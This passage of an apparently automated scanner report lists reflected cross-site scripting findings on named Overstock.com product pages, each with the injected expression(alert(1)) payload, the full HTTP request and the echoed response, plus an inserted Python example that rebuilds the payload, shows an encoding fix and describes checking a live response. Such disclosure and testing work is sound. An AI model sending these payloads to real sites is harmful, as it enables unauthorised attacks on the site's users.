The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4126"style%3d"x%3aexpression(alert(1))"2341eb9682a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4126"style="x:expression(alert(1))"2341eb9682a in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to run JavaScript in the document. Note that expression() is honoured only by older versions of Internet Explorer and will not fire in other browsers; the underlying flaw, a double quote that is reflected unencoded and closes the attribute, is browser-independent and can carry other attribute-based payloads.

Request

GET /Clothing-Shoes/Jessica-Simpson-Womens-Double-breasted-Coat/5149474/product.html?a4126"style%3d"x%3aexpression(alert(1))"2341eb9682a=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:12 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:12 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408112093:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5149474|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:12 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:12 GMT; Path=/
Keep-Alive: timeout=5, max=23
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 116035

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Je
...[SNIP]...
<input type="hidden" name="a4126"style="x:expression(alert(1))"2341eb9682a" value="1"/>
...[SNIP]...

2.41. http://www.overstock.com/Clothing-Shoes/JoJo-Designs-Girls-2-piece-Blue-Brown-Floral-Zebra-Rumba-Set/4245360/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/JoJo-Designs-Girls-2-piece-Blue-Brown-Floral-Zebra-Rumba-Set/4245360/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87978"style%3d"x%3aexpression(alert(1))"f1df361dfda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 87978"style="x:expression(alert(1))"f1df361dfda in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to run JavaScript in the document. Note that expression() is honoured only by older versions of Internet Explorer and will not fire in other browsers; the underlying flaw, a double quote that is reflected unencoded and closes the attribute, is browser-independent and can carry other attribute-based payloads.

Request

GET /Clothing-Shoes/JoJo-Designs-Girls-2-piece-Blue-Brown-Floral-Zebra-Rumba-Set/4245360/product.html?87978"style%3d"x%3aexpression(alert(1))"f1df361dfda=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:28 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:28 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4245360|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:28 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408128657:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:28 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111046

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Jo
...[SNIP]...
<input type="hidden" name="87978"style="x:expression(alert(1))"f1df361dfda" value="1"/>
...[SNIP]...

2.42. http://www.overstock.com/Clothing-Shoes/Journee-Collection-Womens-Luxury-Shawl/3876012/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Journee-Collection-Womens-Luxury-Shawl/3876012/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca310"style%3d"x%3aexpression(alert(1))"3bd84c4e9aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca310"style="x:expression(alert(1))"3bd84c4e9aa in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to run JavaScript in the document. Note that expression() is honoured only by older versions of Internet Explorer and will not fire in other browsers; the underlying flaw, a double quote that is reflected unencoded and closes the attribute, is browser-independent and can carry other attribute-based payloads.
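Every entry in this section reports the same mechanism: a parameter name is copied into a double-quoted name attribute of a hidden input, and the unencoded double quote in the canary closes that attribute so the rest of the payload becomes a new style attribute. The following Python is an added example, not part of the scanner report or of Overstock's code. It builds a canary in the same shape as the scanner's, renders it through two hypothetical server templates (a vulnerable one modelled on the <input> line the report reproduces, and a fixed one that attribute-encodes the name), and uses a real HTML parser to decide whether the breakout succeeded. The two template functions are assumptions; the report only shows their output.

```python
"""Added example (not part of the scanner report): reproduce the attribute-context
reflection described in the entries above and show the encoding that closes it.

Assumptions, labelled here and in the comments: the two *_hidden_input functions
are hypothetical stand-ins for the server-side template; the report only shows
its output. The markup they emit is modelled on the <input> line the report
reproduces, not copied from the live site.
"""
import html
from html.parser import HTMLParser

# Same breakout the scanner used: close the name attribute, open a style attribute.
BREAKOUT = '"style="x:expression(alert(1))"'


def make_payload(prefix: str, suffix: str) -> tuple[str, str]:
    """Build the canary in the report's shape and its query-string form.

    The request lines in the report leave the quote and parentheses raw and
    percent-encode only '=' and ':', so the encoded form is built the same way.
    """
    raw = f"{prefix}{BREAKOUT}{suffix}"
    encoded = raw.replace("=", "%3d").replace(":", "%3a")
    return raw, encoded


def vulnerable_hidden_input(param_name: str) -> str:
    """Hypothetical template matching the report's output: the parameter name is
    interpolated into a double-quoted attribute with no encoding."""
    return f'<input type="hidden" name="{param_name}" value="1"/>'


def fixed_hidden_input(param_name: str) -> str:
    """Hypothetical fix: HTML-attribute-encode the name (quote=True turns '"'
    into &quot;), so user input can no longer close the attribute."""
    return f'<input type="hidden" name="{html.escape(param_name, quote=True)}" value="1"/>'


class _InputAttrs(HTMLParser):
    """Collect the attribute dictionary of every <input> tag, as a parser sees it."""

    def __init__(self) -> None:
        super().__init__()
        self.inputs: list[dict] = []

    def handle_starttag(self, tag: str, attrs: list) -> None:
        if tag == "input":
            self.inputs.append(dict(attrs))


def injected_style_attrs(markup: str) -> list[str]:
    """Return the value of every style attribute a parser finds on <input> tags.

    A non-empty list means the quote in the payload really closed the name
    attribute and the injected style became a separate attribute, which is the
    condition the scanner rates as 'Certain'.
    """
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return [a["style"] for a in parser.inputs if a.get("style") is not None]


def is_reflected_unencoded(markup: str, raw_payload: str) -> bool:
    """Cheap first check: does the raw payload, quotes included, appear verbatim?"""
    return raw_payload in markup


if __name__ == "__main__":
    raw, encoded = make_payload("734dc", "74977cb26be")
    print("query string:", f"?{encoded}=1")
    for label, render in (("vulnerable", vulnerable_hidden_input), ("fixed", fixed_hidden_input)):
        markup = render(raw)
        print(f"{label}: {markup}")
        print("  reflected unencoded:", is_reflected_unencoded(markup, raw))
        print("  injected style attrs:", injected_style_attrs(markup))
```

To verify one of these findings against a live response, send the encoded form as the parameter name (the `?<encoded>=1` query string above), then run injected_style_attrs over the response body: the parser check does not depend on which payload fires in which browser, so it confirms the attribute breakout even where expression() itself would be ignored. The fix is the encoding in fixed_hidden_input; with the quote rendered as &quot; the parser sees a single name attribute and no style attribute.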

Request

GET /Clothing-Shoes/Journee-Collection-Womens-Luxury-Shawl/3876012/product.html?ca310"style%3d"x%3aexpression(alert(1))"3bd84c4e9aa=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:04:45 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:04:45 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289405085388:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:45 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3876012|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:45 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=47
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 118058

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Jo
...[SNIP]...
<input type="hidden" name="ca310"style="x:expression(alert(1))"3bd84c4e9aa" value="1"/>
...[SNIP]...

2.43. http://www.overstock.com/Clothing-Shoes/Journee-Collection-Womens-Oversize-Sunglasses/4101368/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Journee-Collection-Womens-Oversize-Sunglasses/4101368/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e55d"style%3d"x%3aexpression(alert(1))"6104c3f7437 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e55d"style="x:expression(alert(1))"6104c3f7437 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/Journee-Collection-Womens-Oversize-Sunglasses/4101368/product.html?5e55d"style%3d"x%3aexpression(alert(1))"6104c3f7437=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:59:23 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:24 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4101368|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:24 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404763982:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:24 GMT; Path=/
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Jo
...[SNIP]...
<input type="hidden" name="5e55d"style="x:expression(alert(1))"6104c3f7437" value="1"/>
...[SNIP]...

2.44. http://www.overstock.com/Clothing-Shoes/Journee-Womens-Knee-high-Platform-Slouch-Boots/5158589/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Journee-Womens-Knee-high-Platform-Slouch-Boots/5158589/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21359"style%3d"x%3aexpression(alert(1))"b582e3e7a97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21359"style="x:expression(alert(1))"b582e3e7a97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/Journee-Womens-Knee-high-Platform-Slouch-Boots/5158589/product.html?21359"style%3d"x%3aexpression(alert(1))"b582e3e7a97=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:49 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:49 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408269564:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:49 GMT; Path=/
Set-Cookie: mxcproclicks=5158589|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:49 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=32
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 119999

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Jo
...[SNIP]...
<input type="hidden" name="21359"style="x:expression(alert(1))"b582e3e7a97" value="1"/>
...[SNIP]...

2.45. http://www.overstock.com/Clothing-Shoes/Kenneth-Cole-New-York-Chain-of-Command-Large-Hobo/4844370/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Kenneth-Cole-New-York-Chain-of-Command-Large-Hobo/4844370/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f41e1"style%3d"x%3aexpression(alert(1))"97eb311cfad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f41e1"style="x:expression(alert(1))"97eb311cfad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/Kenneth-Cole-New-York-Chain-of-Command-Large-Hobo/4844370/product.html?f41e1"style%3d"x%3aexpression(alert(1))"97eb311cfad=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:42 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:42 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:42 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4844370|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:42 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408202136:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106682

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>Ke
...[SNIP]...
<input type="hidden" name="f41e1"style="x:expression(alert(1))"97eb311cfad" value="1"/>
...[SNIP]...

2.46. http://www.overstock.com/Clothing-Shoes/Kenneth-Cole-New-York-Mens-Down-Coat/4852352/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Kenneth-Cole-New-York-Mens-Down-Coat/4852352/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42221"style%3d"x%3aexpression(alert(1))"04a83355377 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42221"style="x:expression(alert(1))"04a83355377 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/Kenneth-Cole-New-York-Mens-Down-Coat/4852352/product.html?42221"style%3d"x%3aexpression(alert(1))"04a83355377=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:01:36 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:01:36 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:01:36 GMT; Path=/
Set-Cookie: mxcproclicks=4852352|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:01:36 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
